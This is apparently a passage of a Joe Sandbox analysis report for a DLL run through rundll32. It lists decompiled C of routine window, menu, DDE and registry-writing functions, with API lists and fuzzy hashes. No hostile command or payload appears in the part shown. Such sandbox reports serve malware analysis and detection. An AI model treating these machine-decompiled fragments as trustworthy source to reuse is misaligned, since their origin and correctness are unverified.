                                                                        0x10030b0f
                                                                        0x10030b18
                                                                        0x10030b11
                                                                        0x10030b11
                                                                        0x10030b11
                                                                        0x00000000
                                                                        0x10030b0f
                                                                        0x10030ae1
                                                                        0x10030ae2
                                                                        0x10030b77
                                                                        0x10030b7d
                                                                        0x10030b7f
                                                                        0x10030b88
                                                                        0x10030b81
                                                                        0x10030b81
                                                                        0x10030b81
                                                                        0x00000000
                                                                        0x10030b8f
                                                                        0x10030aea
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10030af0
                                                                        0x00000000
                                                                        0x10030af0
                                                                        0x10030b6d
                                                                        0x10030b70
                                                                        0x00000000
                                                                        0x10030b70

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Capture$Message$Dispatch
                                                                        • String ID:
                                                                        • API String ID: 3654672037-0
                                                                        • Opcode ID: e6b58cd4b20e416105edfb9c4440ad9ba75aaff5f0d161abc900f8068c81e4c6
                                                                        • Instruction ID: d9b79505f63fc07e8b5b8f3565facbd5cf555a7e12dc77f8d6b56f2636bb58fe
                                                                        • Opcode Fuzzy Hash: e6b58cd4b20e416105edfb9c4440ad9ba75aaff5f0d161abc900f8068c81e4c6
                                                                        • Instruction Fuzzy Hash: 8431B434A02609AFCB63DBB58C65D6FF6E8EF80787F104419B445DA163CB30A980D762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002A1CA Relevance: 9.1, APIs: 6, Instructions: 69windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E1002A1CA(void* __ecx) {
				struct HACCEL__* _t25;
				void* _t44;
				void* _t45;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t47;
				struct HINSTANCE__* _t48;

				_t44 = __ecx;
				_t40 = __ecx + 0x60;
				_t25 =  *(__ecx + 0x60);
				_t45 = 0;
				if( *((intOrPtr*)(_t25 - 0xc)) == 0) {
					_t25 = E10006A60(_t40,  *((intOrPtr*)(__ecx + 0x3c)));
				}
				if( *(_t44 + 0x44) != _t45 &&  *((intOrPtr*)(_t44 + 0x2c)) == _t45) {
					_t48 =  *(E100373B5() + 0xc);
					 *((intOrPtr*)(_t44 + 0x2c)) = LoadMenuA(_t48,  *(_t44 + 0x44) & 0x0000ffff);
					_t25 = LoadAcceleratorsA(_t48,  *(_t44 + 0x44) & 0x0000ffff);
					 *(_t44 + 0x30) = _t25;
					_t45 = 0;
				}
				if( *(_t44 + 0x40) != _t45 &&  *((intOrPtr*)(_t44 + 0x34)) == _t45) {
					_t47 =  *(E100373B5() + 0xc);
					 *((intOrPtr*)(_t44 + 0x34)) = LoadMenuA(_t47,  *(_t44 + 0x40) & 0x0000ffff);
					_t25 = LoadAcceleratorsA(_t47,  *(_t44 + 0x40) & 0x0000ffff);
					 *(_t44 + 0x38) = _t25;
					_t45 = 0;
				}
				if( *(_t44 + 0x48) != _t45 &&  *((intOrPtr*)(_t44 + 0x24)) == _t45) {
					_t46 =  *(E100373B5() + 0xc);
					 *((intOrPtr*)(_t44 + 0x24)) = LoadMenuA(_t46,  *(_t44 + 0x48) & 0x0000ffff);
					_t25 = LoadAcceleratorsA(_t46,  *(_t44 + 0x48) & 0x0000ffff);
					 *(_t44 + 0x28) = _t25;
				}
				return _t25;
			}









                                                                        0x1002a1cd
                                                                        0x1002a1cf
                                                                        0x1002a1d2
                                                                        0x1002a1d4
                                                                        0x1002a1da
                                                                        0x1002a1df
                                                                        0x1002a1df
                                                                        0x1002a1f3
                                                                        0x1002a1ff
                                                                        0x1002a20a
                                                                        0x1002a213
                                                                        0x1002a215
                                                                        0x1002a218
                                                                        0x1002a218
                                                                        0x1002a21d
                                                                        0x1002a229
                                                                        0x1002a234
                                                                        0x1002a23d
                                                                        0x1002a23f
                                                                        0x1002a242
                                                                        0x1002a242
                                                                        0x1002a247
                                                                        0x1002a253
                                                                        0x1002a25e
                                                                        0x1002a267
                                                                        0x1002a269
                                                                        0x1002a269
                                                                        0x1002a270

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Load$AcceleratorsMenu
                                                                        • String ID:
                                                                        • API String ID: 144087665-0
                                                                        • Opcode ID: 62af814d51333b06cd62be60a646d7531518e2420bbbd48c9c7e9b7b2b0652c4
                                                                        • Instruction ID: 79ec512449ce6a4c7bf2710ae8ff5bed15bebc86ac40dbf708adfd4365bfde7a
                                                                        • Opcode Fuzzy Hash: 62af814d51333b06cd62be60a646d7531518e2420bbbd48c9c7e9b7b2b0652c4
                                                                        • Instruction Fuzzy Hash: 8821EA75401B18DFC3B0EF6A9940937F3F8FF09651751446FEA8A86912DA36F890DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002B105 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E1002B105(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E1002B0CC();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x1c);
					goto L7;
				}
				_t13 = E10006C53();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}









                                                                        0x1002b10d
                                                                        0x1002b115
                                                                        0x1002b117
                                                                        0x1002b134
                                                                        0x1002b142
                                                                        0x1002b14d
                                                                        0x1002b14f
                                                                        0x1002b151
                                                                        0x1002b153
                                                                        0x1002b15e
                                                                        0x1002b160
                                                                        0x1002b16d
                                                                        0x1002b16d
                                                                        0x1002b16f
                                                                        0x1002b175
                                                                        0x1002b179
                                                                        0x1002b197
                                                                        0x1002b18a
                                                                        0x1002b18d
                                                                        0x1002b18f
                                                                        0x1002b18f
                                                                        0x1002b179
                                                                        0x1002b1a0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002b155
                                                                        0x1002b155
                                                                        0x1002b156
                                                                        0x1002b158
                                                                        0x1002b15a
                                                                        0x00000000
                                                                        0x1002b155
                                                                        0x1002b147
                                                                        0x1002b149
                                                                        0x1002b14b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002b14b
                                                                        0x1002b119
                                                                        0x1002b120
                                                                        0x1002b12f
                                                                        0x1002b12f
                                                                        0x00000000
                                                                        0x1002b12f
                                                                        0x1002b122
                                                                        0x1002b129
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002b12b
                                                                        0x00000000

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                        • String ID:
                                                                        • API String ID: 670545878-0
                                                                        • Opcode ID: b64e7204216b1f048a42a3b80a98cdaf99d57a40f09b93da801bfd405b8b7097
                                                                        • Instruction ID: ef498eb2053f32fc83163eb1be06eb9c016c70d7a0359ba6d8f1e9348af6cf1d
                                                                        • Opcode Fuzzy Hash: b64e7204216b1f048a42a3b80a98cdaf99d57a40f09b93da801bfd405b8b7097
                                                                        • Instruction Fuzzy Hash: E111A332601F764FD362DA6AACA4B2B77DCDF41BD1FD20159EC04D7211DB60EC104290
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002B501 Relevance: 9.1, APIs: 6, Instructions: 57registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E1002B501(intOrPtr __ecx, CHAR* _a4, char* _a8, char* _a12) {
				long _t21;
				void* _t28;

				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x64));
				}
				if(_a8 != 0) {
					_t28 = E10035959(__ecx, _a4);
					if(_a12 != 0) {
						if(_t28 == 0) {
							L3:
							return 0;
						}
						_t21 = RegSetValueExA(_t28, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);
						L10:
						RegCloseKey(_t28);
						return 0 | _t21 == 0x00000000;
					}
					if(_t28 == 0) {
						goto L3;
					}
					_t21 = RegDeleteValueA(_t28, _a8);
					goto L10;
				}
				_t28 = E100358C8(__ecx);
				if(_t28 != 0) {
					_t21 = RegDeleteKeyA(_t28, _a4);
					goto L10;
				}
				goto L3;
			}





                                                                        0x1002b50a
                                                                        0x00000000
                                                                        0x1002b58b
                                                                        0x1002b510
                                                                        0x1002b539
                                                                        0x1002b53b
                                                                        0x1002b54f
                                                                        0x1002b51d
                                                                        0x00000000
                                                                        0x1002b51d
                                                                        0x1002b567
                                                                        0x1002b56d
                                                                        0x1002b570
                                                                        0x00000000
                                                                        0x1002b57a
                                                                        0x1002b53f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002b545
                                                                        0x00000000
                                                                        0x1002b545
                                                                        0x1002b517
                                                                        0x1002b51b
                                                                        0x1002b525
                                                                        0x00000000
                                                                        0x1002b525
                                                                        0x00000000

                                                                        APIs
                                                                        • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 1002B525
                                                                        • RegDeleteValueA.ADVAPI32(00000000,00000000,?,00000000), ref: 1002B545
                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,10024C29,?), ref: 1002B570
                                                                          • Part of subcall function 100358C8: RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 100358F6
                                                                          • Part of subcall function 100358C8: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10035919
                                                                          • Part of subcall function 100358C8: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 10035935
                                                                          • Part of subcall function 100358C8: RegCloseKey.ADVAPI32(?), ref: 10035945
                                                                          • Part of subcall function 100358C8: RegCloseKey.ADVAPI32(?), ref: 1003594F
                                                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002B58B
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
                                                                        • String ID:
                                                                        • API String ID: 1886894508-0
                                                                        • Opcode ID: cbf87bc0068c303cc6394e99f804432e3955d1a9386c7571ee80164618b64494
                                                                        • Instruction ID: c8f527a64b8234d0edd8db9930868310c0db2fd70ee1d53d59517915cf010f6f
                                                                        • Opcode Fuzzy Hash: cbf87bc0068c303cc6394e99f804432e3955d1a9386c7571ee80164618b64494
                                                                        • Instruction Fuzzy Hash: D1114832401E79FFDB128F61DC48F9E3BA9EF043A1F814510FD049D061CB328A61AB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10031F4A Relevance: 9.1, APIs: 6, Instructions: 56stringwindowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 46%
                                                                        			E10031F4A(void* __ebx, void* __ecx, void* __edi, void* __esi, struct HWND__* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v528;
				void* _v532;
				char _v536;
				intOrPtr _t15;
				long _t22;
				void* _t25;
				void* _t29;

				_t15 =  *0x1004c470; // 0x1bfbe703
				_v8 = _t15;
				_push( &_v532);
				_push( &_v536);
				_push(_a8);
				_push(0x3e8);
				_t29 = __ecx;
				L1001CA38();
				if(lstrlenA(GlobalLock(_v532)) < 0x208) {
					_t22 = GlobalUnlock(_v532);
					_push(_v532);
					_push(0x8000);
					_push(0x3e4);
					_push(0x3e8);
					_push(_a8);
					L1001CA32();
					PostMessageA(_a4, 0x3e4,  *(_t29 + 0x1c), _t22);
					if(E100203CE(_t29) != 0) {
						_t25 = E100373B5();
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t25 + 4)))) + 0xa0))( &_v528);
					}
				}
				return E100117AE(0, _v8);
			}











                                                                        0x10031f53
                                                                        0x10031f5a
                                                                        0x10031f63
                                                                        0x10031f6a
                                                                        0x10031f6b
                                                                        0x10031f73
                                                                        0x10031f74
                                                                        0x10031f76
                                                                        0x10031f93
                                                                        0x10031f9c
                                                                        0x10031fa2
                                                                        0x10031fad
                                                                        0x10031fb2
                                                                        0x10031fb3
                                                                        0x10031fb4
                                                                        0x10031fb7
                                                                        0x10031fc4
                                                                        0x10031fd4
                                                                        0x10031fd6
                                                                        0x10031fe9
                                                                        0x10031fe9
                                                                        0x10031fd4
                                                                        0x10031ffc

                                                                        APIs
                                                                        • UnpackDDElParam.USER32 ref: 10031F76
                                                                        • GlobalLock.KERNEL32 ref: 10031F81
                                                                        • lstrlenA.KERNEL32(00000000), ref: 10031F88
                                                                        • GlobalUnlock.KERNEL32(?), ref: 10031F9C
                                                                        • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 10031FB7
                                                                        • PostMessageA.USER32 ref: 10031FC4
                                                                          • Part of subcall function 100203CE: IsWindowEnabled.USER32(?), ref: 100203D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrlen
                                                                        • String ID:
                                                                        • API String ID: 462239228-0
                                                                        • Opcode ID: 9b3d271c77589773dafac36f7ca5bc7fab3ad5ea6926df52b529a664096dacb0
                                                                        • Instruction ID: bfbb9d00b13f65a0ab326070f2ebd1bafe94df8b281a4b7973d805b3987b007f
                                                                        • Opcode Fuzzy Hash: 9b3d271c77589773dafac36f7ca5bc7fab3ad5ea6926df52b529a664096dacb0
                                                                        • Instruction Fuzzy Hash: 8D111C3554121CAFDB12DFA1DC88DDE7BB9FF55351F0045A5F809EA262DA34DE808B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10029BA4 Relevance: 9.0, APIs: 6, Instructions: 48windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10029BA4(struct HWND__* _a4) {
				struct HWND__* _t3;
				struct HWND__* _t6;
				struct HWND__* _t11;
				struct HWND__* _t14;

				_t3 = GetFocus();
				_t14 = _t3;
				if(_t14 != 0) {
					_t11 = _a4;
					if(_t14 == _t11) {
						L10:
						return _t3;
					}
					if(E10029A8E(_t14, 3) != 0) {
						L5:
						if(_t11 == 0 || (GetWindowLongA(_t11, 0xfffffff0) & 0x40000000) == 0) {
							L8:
							_t3 = SendMessageA(_t14, 0x14f, 0, 0);
							goto L9;
						} else {
							_t6 = GetParent(_t11);
							_t3 = GetDesktopWindow();
							if(_t6 == _t3) {
								L9:
								goto L10;
							}
							goto L8;
						}
					}
					_t3 = GetParent(_t14);
					_t14 = _t3;
					if(_t14 == _t11) {
						goto L9;
					}
					_t3 = E10029A8E(_t14, 2);
					if(_t3 == 0) {
						goto L9;
					}
					goto L5;
				}
				return _t3;
			}







                                                                        0x10029ba5
                                                                        0x10029bab
                                                                        0x10029baf
                                                                        0x10029bb2
                                                                        0x10029bb8
                                                                        0x10029c16
                                                                        0x00000000
                                                                        0x10029c16
                                                                        0x10029bcb
                                                                        0x10029be2
                                                                        0x10029be4
                                                                        0x10029c05
                                                                        0x10029c0f
                                                                        0x00000000
                                                                        0x10029bf6
                                                                        0x10029bf7
                                                                        0x10029bfb
                                                                        0x10029c03
                                                                        0x10029c15
                                                                        0x00000000
                                                                        0x10029c15
                                                                        0x00000000
                                                                        0x10029c03
                                                                        0x10029be4
                                                                        0x10029bce
                                                                        0x10029bd0
                                                                        0x10029bd4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10029bd9
                                                                        0x10029be0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10029be0
                                                                        0x10029c18

                                                                        APIs
                                                                        • GetFocus.USER32 ref: 10029BA5
                                                                          • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                        • GetParent.USER32(00000000), ref: 10029BCE
                                                                          • Part of subcall function 10029A8E: GetClassNameA.USER32(00000000,?,0000000A), ref: 10029AC2
                                                                          • Part of subcall function 10029A8E: lstrcmpiA.KERNEL32(?,combobox), ref: 10029AD1
                                                                        • GetWindowLongA.USER32 ref: 10029BE9
                                                                        • GetParent.USER32(10032120), ref: 10029BF7
                                                                        • GetDesktopWindow.USER32 ref: 10029BFB
                                                                        • SendMessageA.USER32 ref: 10029C0F
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$LongParent$ClassDesktopFocusMessageNameSendlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 2818563221-0
                                                                        • Opcode ID: e89a53c623c721cb0c3fcde6a2588c450b9b76455553080e70e491aeb3ad2bbb
                                                                        • Instruction ID: cea5fa679d97d2953b6d76dc507eb4c5e7da3a0c11b163d723fb81d4da4a6e61
                                                                        • Opcode Fuzzy Hash: e89a53c623c721cb0c3fcde6a2588c450b9b76455553080e70e491aeb3ad2bbb
                                                                        • Instruction Fuzzy Hash: 7FF0A932500A306EE353A62B6D88F5E61D8DF81BD0FB20214F459E6192EB24AC8145A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10037A96 Relevance: 9.0, APIs: 6, Instructions: 47registrystringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 91%
                                                                        			E10037A96(void* _a4, char* _a8, char* _a12) {
				void* _t14;
				long _t18;
				signed int _t20;
				long _t25;

				if(_a12 != 0) {
					if(RegCreateKeyA(0x80000000, _a4,  &_a4) != 0) {
						L6:
						_t14 = 0;
						L7:
						return _t14;
					}
					_t25 = RegSetValueExA(_a4, _a12, 0, 1, _a8, lstrlenA(_a8) + 1);
					_t18 = RegCloseKey(_a4);
					if(_t18 != 0 || _t25 != 0) {
						goto L6;
					} else {
						_t14 = _t18 + 1;
						goto L7;
					}
				}
				_t20 = RegSetValueA(0x80000000, _a4, 1, _a8, lstrlenA(_a8));
				asm("sbb eax, eax");
				return  ~_t20 + 1;
			}







                                                                        0x10037a9d
                                                                        0x10037ad8
                                                                        0x10037b0e
                                                                        0x10037b0e
                                                                        0x10037b10
                                                                        0x00000000
                                                                        0x10037b10
                                                                        0x10037afb
                                                                        0x10037afd
                                                                        0x10037b05
                                                                        0x00000000
                                                                        0x10037b0b
                                                                        0x10037b0b
                                                                        0x00000000
                                                                        0x10037b0b
                                                                        0x10037b05
                                                                        0x10037ab6
                                                                        0x10037abe
                                                                        0x00000000

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?), ref: 10037AA2
                                                                        • RegSetValueA.ADVAPI32(80000000,?,00000001,?,00000000), ref: 10037AB6
                                                                        • RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 10037AD0
                                                                        • lstrlenA.KERNEL32(?), ref: 10037ADD
                                                                        • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 10037AF2
                                                                        • RegCloseKey.ADVAPI32(?), ref: 10037AFD
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Valuelstrlen$CloseCreate
                                                                        • String ID:
                                                                        • API String ID: 306239685-0
                                                                        • Opcode ID: 44992d35b15f20819090c12f9012e6152085e8f08d1dc228d24d782121a6f8e9
                                                                        • Instruction ID: 36ac44db30e1571f4bd1a6b15574b4d5f9e82ccdf85d97020e0dea724d6fc6de
                                                                        • Opcode Fuzzy Hash: 44992d35b15f20819090c12f9012e6152085e8f08d1dc228d24d782121a6f8e9
                                                                        • Instruction Fuzzy Hash: 4501043220016DFFEB235FA1DD48F9A7BA9FB08792F108410FE1AD9061D3718A60DB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10029C98 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 90%
                                                                        			E10029C98(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_t12 = GetWindow(_a4, 5);
				while(1) {
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_t12 = GetWindow(_t21, 2);
				}
				return _t12;
			}






                                                                        0x10029ca7
                                                                        0x10029cf8
                                                                        0x10029cf8
                                                                        0x10029cfa
                                                                        0x10029cfe
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10029cc4
                                                                        0x10029cdb
                                                                        0x10029ce1
                                                                        0x10029cf3
                                                                        0x00000000
                                                                        0x10029d06
                                                                        0x10029cf3
                                                                        0x10029cf8
                                                                        0x10029cf8
                                                                        0x10029d03

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rect$ClientCtrlLongScreen
                                                                        • String ID:
                                                                        • API String ID: 1315500227-0
                                                                        • Opcode ID: 3db020920b72c671971993ae9780b3d492816d86ba5cd9127ef1e8eba5203929
                                                                        • Instruction ID: 9b9f6f1c131c314e5c19284c1e668e0a3a9e33f7fca6b6c160f9dd0f3207debf
                                                                        • Opcode Fuzzy Hash: 3db020920b72c671971993ae9780b3d492816d86ba5cd9127ef1e8eba5203929
                                                                        • Instruction Fuzzy Hash: 7A01623650056ABFDB129F569C48EEE37ADEF017D0F514115FD11EA161D730DA01DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10022233 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10022233(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				long _t34;
				long _t43;
				struct HWND__* _t48;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E1001F7AE();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x1c)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x1c)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x20)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x44));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x44)) = 0;
				}
